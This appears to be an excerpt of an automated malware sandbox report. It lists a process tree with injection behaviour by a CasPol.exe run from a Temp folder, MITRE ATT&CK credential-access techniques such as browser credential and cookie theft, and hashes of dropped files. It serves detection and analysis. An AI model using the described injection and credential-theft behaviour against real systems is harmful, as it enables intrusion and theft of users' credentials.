- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exeC:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3208
-
-
C:\Windows\SysWOW64\gpupdate.exeC:\Windows\SysWOW64\gpupdate.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:744
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2376
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1972
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:656
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5d253412be7316e6d01bbf91fca2fc5fd
SHA1979b403133a85dba50e7dbd62cf1bad735613fd7
SHA25662da34622971298623cec69efa2966451c6b72f6d18a686b4a6daf8720994d23
SHA51272c948a3e3cd5e01959a45f814ff486b888e4d5d97bcb740dfc661dc8acef34eb558f5890da388e2c827095b99d162b221eff5dc2a8db0afffa3a960bfc0f1a7
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
17KB
MD518c8e608cb6d77b361af2f7831b3ef8f
SHA12fde51c5b87400d9d084a296e7c814317cd98317
SHA2567293d8b7688fa078e531bbef966b1c3be5d8d8372137c902fb3f254fbbd476c0
SHA51273a0554132d4c5337e22356e3362d89c4a0f0f777f6b338db29e9b75127574c49e9a937efc83372c410c40d66a2560f9d497afced3a2b7bf37538fc68ad6a0d3
-
Filesize
80KB
MD5e36ec81524a93c45a2282b757e117ab0
SHA14b0247e6e8cc62fb465b6b67c1bdf4d34334f8f9
SHA2564b436f5edfcc66ecc840f6f14427405e688f7c5d2ed637cc2ff91b3b1c3187c1
SHA512b762876ddc8139c66d3d39995f49d98153c2e7fe88483669b294bded7cfa916e4d0b5f2735cd02de853972e77cfdf3f961cbb6d9b067a97882a17a1f428fc207
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
280B
MD565044109d1beb8ed8d59560642cbc519
SHA10084485b0aa26069232fab51ee603682e8edfd17
SHA256a1e0b448218678b30356cbbe4092ea091435e7450822a9748361b6e8b198962d
SHA51296dcc68fe92f98c4329a8335cfffdb0849a52562431045ccc42076bda0abf3842491303fb669246bfd04e64113688d3f90000a09571dd76ff84b52e34e45f9b6
-
Filesize
33KB
MD5819b8f9620fd7501d7f72ced5fa4c1c0
SHA1a3aff5010fcd703a9907249d6e73be6fd9997586
SHA2563d4d7f76490781c3bd60a28cd6e1db070c2132e7b863a8aa0a675e71083894cf
SHA512107f113bdf0e70efdea516e45050d5294b0cb64dbd266944df5e4c648cafb36491d57d76a9fa3e17b687803dbee027ca334410b37ac8a7126c0b13ed2ac8573b
-
Filesize
40KB
MD5dc6b565397d89e73575175bbd9b8429d
SHA1590b17d6c9cbe2992954898987e8072259848362
SHA256392853a40fcbbaf154bda72e941cf48eee1764173ebba9b9f04d11158be732e7
SHA5123e921352e41ef75c46737a74b78765b5b8ce1ef53b9fc6be4387204b025b5ea9bdbfed07fe9ea1d0a3c533013950a23385d9cf84a1d9dc96afd7252cf67902c5
-
Filesize
64B
MD506aae955eb04310fe40698f5d7bf0100
SHA116ec0684a8b66f0ff7368455c46cf7d70ae535b7
SHA256a0f80c1fc0cc22007be466bdb14f1796deb11ac300a2666a4499d421cb1b8398
SHA512baf164e644a6b0caecafe83b21daf1f1c1d26c296b9fbd0626fec777cf7ffd9525b4a04e331109e84ab6315d9b3798ced1fadb1bd5b6c2871afd968ab2c47f86
-
Filesize
99KB
MD5f61fa5ce25f885a9b1f549055c9911ed
SHA1aba1c035b06017b0b0bd1c712669646e4f3765ab
SHA25657e9675902b443085e37ead57dfed97de6bb61321682bc93aff30f16b5ca5aeb
SHA51202e3db343037294fd3b774f954c9a617a50715e6b89d7c409f3c7dc5a1cf5ed9418158c442e9e80111994da139a9a16db33ac68a833d6d115c4a41bdf75751ac
-
Filesize
2.9MB
MD51c016531f2b109e3c8e06895188c3c79
SHA10f56fc7890cadb94a1029474912dab7b146a7376
SHA2563e4dd65697cca5eae6361ea44145249a0978c945529d45015e4ede084977b99c
SHA51287dba3edec8951052b21230ce69c1d948d93268c86ed3d7e579d2c3341b9d03803ba8d76b5079f74590f41196eb15efebfb8530a0a646419500eef0cce83cc42
-
Filesize
2.7MB
MD5289b76dc82af9fad4c10a46ff39678bb
SHA15674d627efae41cfa3d5d489b023fc727bbda3a7
SHA256b5c6617345632db0894f111076f773a015b23094921c453ec98c31efd2b00c21
SHA512fb2335b97836d2174859e3bef7ad335bc03b188cbea75b5cd6e10dc2209a2711158344ae966e646b70672eedfd042a1facf86ad6e9774ad96ad2d3a8bc234bcc
-
Filesize
2.7MB
MD5c4d6af893cafe77992478141cd50a8aa
SHA18a3416f6aa1a88d6c762f62ffa15a228d87db6d3
SHA25634b6550114b545befc0a7131aba3d538b8935b534e5bf2738dd3e9afae2e8197
SHA512d5d00e1dce5f0abd76ba622a80e74b70ba95b9b14dee400bf71b5addfb08f27d071d870bc849fa065b31b043ae5f9e16d6ca4020e1bbb0d3dfd4eb0ef6563b35
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
596B
MD5aa0e77ec6b92f58452bb5577b9980e6f
SHA1237872f2b0c90e8cbe61eaa0e2919d6578cacd3f
SHA256aad1c9be17f64d7700feb2d38df7dc7446a48bf001ae42095b59b11fd24dfcde
SHA51237366bd1e0a59036fe966f2e2fe3a0f7dce6f11f2ed5bf7724afb61ea5e8d3e01bdc514f0deb3beb6febfd8b4d08d45e4e729c23cc8f4cae4f6d11f18fc39fa6
-
Filesize
1KB
MD5a9e79f324f55939fe241416a42179a65
SHA1a234f26baa7c93ad93bbed4280c714dd80395006
SHA2561becdd408d092fbfb403490377787e7913da3f7b6263217195a6781fbaa8ef65
SHA5124984de282c635bfc16c55772f76b33e77175b2900484b373a87de971e85cd0b91225f6424219886cb2df142795258e4395cf937f9a6221f1b26aa22ebfaf9087
-
Filesize
5KB
MD52c905a6e4a21a3fa14adc1d99b7cbc03
SHA1bd8682b580d951e3df05dfd467abba6b87bb43d9
SHA256cc3631ced23f21ae095c1397770e685f12f6ad788c8fa2f15487835a77a380fb
SHA512753e28bab9d50b7882a1308f6072f80fda99edeaa476fafc7e647d29f5c9c15f5c404689c866f8f198b7f1ed41bae3cc55ae4d15528b0df966a47cbc4b31caf6
-
Filesize
93KB
MD53c9137d88a00b1ae0b41ff6a70571615
SHA11797d73e9da4287351f6fbec1b183c19be217c2a
SHA25624262baafef17092927c3dafe764aaa52a2a371b83ed2249cca7e414df99fac1
SHA51231730738e73937ee0086849cb3d6506ea383ca2eac312b8d08e25c60563df5702fc2b92b3778c4b2b66e7fddd6965d74b5a4df5132df3f02faed01dcf3c7bcae
-
Filesize
569B
MD52835dd0a0aef8405d47ab7f73d82eaa5
SHA1851ea2b4f89fc06f6a4cd458840dd5c660a3b76c
SHA2562aafd1356d876255a99905fbcafb516de31952e079923b9ddf33560bbe5ed2f3
SHA512490327e218b0c01239ac419e02a4dc2bd121a08cb7734f8e2ba22e869b60175d599104ba4b45ef580e84e312fe241b3d565fac958b874d6256473c2f987108cc
-
Filesize
5.0MB
MD5e58d905d9e1529e987c9a82a74ce29c9
SHA1b305eef82dc620e836ada7b56de9e98b077bf118
SHA25687f7e5081a34770f1277d101c4ae40126623195cbce621196bde10e46df704b1
SHA512ff0d482d98676b1ffdfdb82ce7ba1327bde0d92deee583335ea5d93e7e8aa81aeae9b59753646fc4d12ee553e7254f654caffaee28d3756030912c7ce729ccfb
-
Filesize
386KB
MD572b1c6699ddc2baab105d32761285df2
SHA1fc85e9fb190f205e6752624a5231515c4ee4e155
SHA256bf7f6f7e527ab8617766bb7a21c21b2895b5275c0e808756c2aadcd66eff8a97
SHA512cde1e754d8dfb2fa55db243517b5dd3d75b209ea6387ef2e4be6157875e536db2373f23434a9e66c119150301c7b7cdf97de5a5544d94c03247b4ae716cbc170